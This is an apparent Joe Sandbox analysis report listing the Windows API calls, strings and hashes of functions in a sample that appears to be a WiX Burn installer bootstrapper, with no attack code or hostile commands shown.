                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 005C2F09
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 005C2F96
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C2FA3
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 005C2FB7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 005C301F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 005C2F66
                                                                                                                                                                                                                                                                                                  • pathutil.cpp, xrefs: 005C2E8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3480017824-1101990113
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7342a1de704ef692dce16385a43ed36b666739446bfd830a4db5566c110a1e58
                                                                                                                                                                                                                                                                                                  • Instruction ID: dac57826232f53b20a103dda77ba603526b1f287425caab2118089277affa474
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7342a1de704ef692dce16385a43ed36b666739446bfd830a4db5566c110a1e58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E71527294112DAFDB319F94DC4DFAABAB9BB08710F1041D9B905B7290D7749E80DFA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,005C53BD,00000000,005C5489,005C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 005CCC1C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 005CCC48
                                                                                                                                                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 005CCD29
                                                                                                                                                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 005CCCEE
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 005CCD1D
                                                                                                                                                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 005CCCF5
                                                                                                                                                                                                                                                                                                  • Failed to get next stream., xrefs: 005CCD03
                                                                                                                                                                                                                                                                                                  • Failed to concat file paths., xrefs: 005CCCFC
                                                                                                                                                                                                                                                                                                  • Failed to extract file., xrefs: 005CCCE7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                                                                                                                                                  • Opcode ID: f56aa491f138dbd567b212e014e55b070d45cbfe90c310c50cb04511ca8a0a47
                                                                                                                                                                                                                                                                                                  • Instruction ID: 153ebd59fdb62b077da5ce8dc00b49faec57e741c24d643b86bb1214ff822432
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f56aa491f138dbd567b212e014e55b070d45cbfe90c310c50cb04511ca8a0a47
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83419F31941219EFCF299FC4CC85FAEBF65BF40710B15816DE81AAB291D7709D40DB90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 005C47BB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 005C47C1
                                                                                                                                                                                                                                                                                                  • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005C484F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 005C489B
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 005C47EE
                                                                                                                                                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 005C481D
                                                                                                                                                                                                                                                                                                  • Failed to create engine for UX., xrefs: 005C47DB
                                                                                                                                                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 005C48A5
                                                                                                                                                                                                                                                                                                  • Failed to load UX., xrefs: 005C4804
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 673430819-2573580774
                                                                                                                                                                                                                                                                                                  • Opcode ID: 40dbb956c1ee7d2f1a0e02ecb6054f4986136663113da8d5899559562cf23159
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16d83b58aa38be1a84f742a949db0a1e3300d5fc3d58ad4349ddba73eafb8402
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40dbb956c1ee7d2f1a0e02ecb6054f4986136663113da8d5899559562cf23159
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6741C071A40156BFEB149BE4CC99FBBBBADFF04314F10452AF905E7280DB21AD418BA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?), ref: 005CD6DA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?,?), ref: 005CD6E7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 005CD71F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,005C548E,?,?), ref: 005CD72B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1866314245-2276003667
                                                                                                                                                                                                                                                                                                  • Opcode ID: b2a62accd9df5eaae3f61c834929e8f872caacf2a9832854eb0d2c2762f92445
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80e204bc094533dbf1396a475ef770d08c628af1e6b41f7f465f54993169b30d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2a62accd9df5eaae3f61c834929e8f872caacf2a9832854eb0d2c2762f92445
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED118E37AC1B32ABDB3556D55C05F1B6AA5BB04B61F024539BE15EA6C0EB20D80086E4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 005CF942
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 005CF94F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read Resume value., xrefs: 005CF8D8
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 005CF8AB
                                                                                                                                                                                                                                                                                                  • Resume, xrefs: 005CF8B6
                                                                                                                                                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 005CF846
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 005CF82F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                                                                                                                                                  • Opcode ID: db17521ec5c7db53481da604e5b8faa03acc6ee49db9d0b0a22fd8fbda6f1567
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bdd361b42d771154f188c01c8266aa79f2dd9cadc1689fb8c234de5dfee3174
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db17521ec5c7db53481da604e5b8faa03acc6ee49db9d0b0a22fd8fbda6f1567
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F413771940119BFDF119FD8C881BADBFA6FB05710F16816AE911AB260C372AE419B80
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6D37098F
                                                                                                                                                                                                                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6D3709A9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2442719207-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b80eadaa01676605fb0dfe6d6fcc9d8d1a1fb708ce61f8c3c9106332bd882302
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a289d2f492ad6fca6aefce02a7a3e6c2337b7951a0e2934f546f293068042de
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b80eadaa01676605fb0dfe6d6fcc9d8d1a1fb708ce61f8c3c9106332bd882302
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F41D572D08A19EFDBB18F56CC41BBE3778EB81B58F028115E5546B250D77B8D01CBA8
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600533
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0062B5F4,?,005D4207,00000000,Setup), ref: 006005D7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?,?,?), ref: 006005E7
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 005C2F09
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0062B5FC,?,?,0062B5F4,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 0060067A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 005E0BC1
                                                                                                                                                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 005E0C35
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0C2B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?,005C53BD,00000000,?,?,?,?,?,?,?,005D769D,00000000), ref: 00600897
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008A1
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,005D769D,00000000), ref: 006008D3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008EC
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005D769D,00000000), ref: 0060092B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4040495316-1178289305
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 005E0CC4
                                                                                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005E0CD6
                                                                                                                                                                                                                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 005E0CE9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,005E08B1,?,?), ref: 005E0CF8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid operation for this state., xrefs: 005E0C9D
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0C93
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00603574
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0062B6C8), ref: 00603591
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0062B6B8,?,?,?,?,?,?), ref: 006035AC
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0062B6B8,?,?,?,?,?,?), ref: 006035B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                                                                                                                                                  • API String ID: 2109125048-2356320334
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00604A9D
                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00604ACA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00604AF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0060B7A0,?,00000000,?,00000000,?,00000000), ref: 00604B34
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00604B65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1145190524-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: be64d58986c426076facfb8a0cdd0838fefae52deb4738e74e020a3a5bf7c743
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3367ca88f6c98801a93225c3f301d704aaa630bd2473dfba7d8f00f1f21ad9c3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be64d58986c426076facfb8a0cdd0838fefae52deb4738e74e020a3a5bf7c743
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF31E776EC0229ABD7259A998C41FAFBAAAAF44750F114155FE04E7381DB31DD0086E4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 005DE985
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 005DE994
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 005DE9A8
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 005DE9B8
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 005DE9D2
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 005DEA31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 682c91fefa945d708f54360bd219247fba3a377a715970133441602dbde4d164
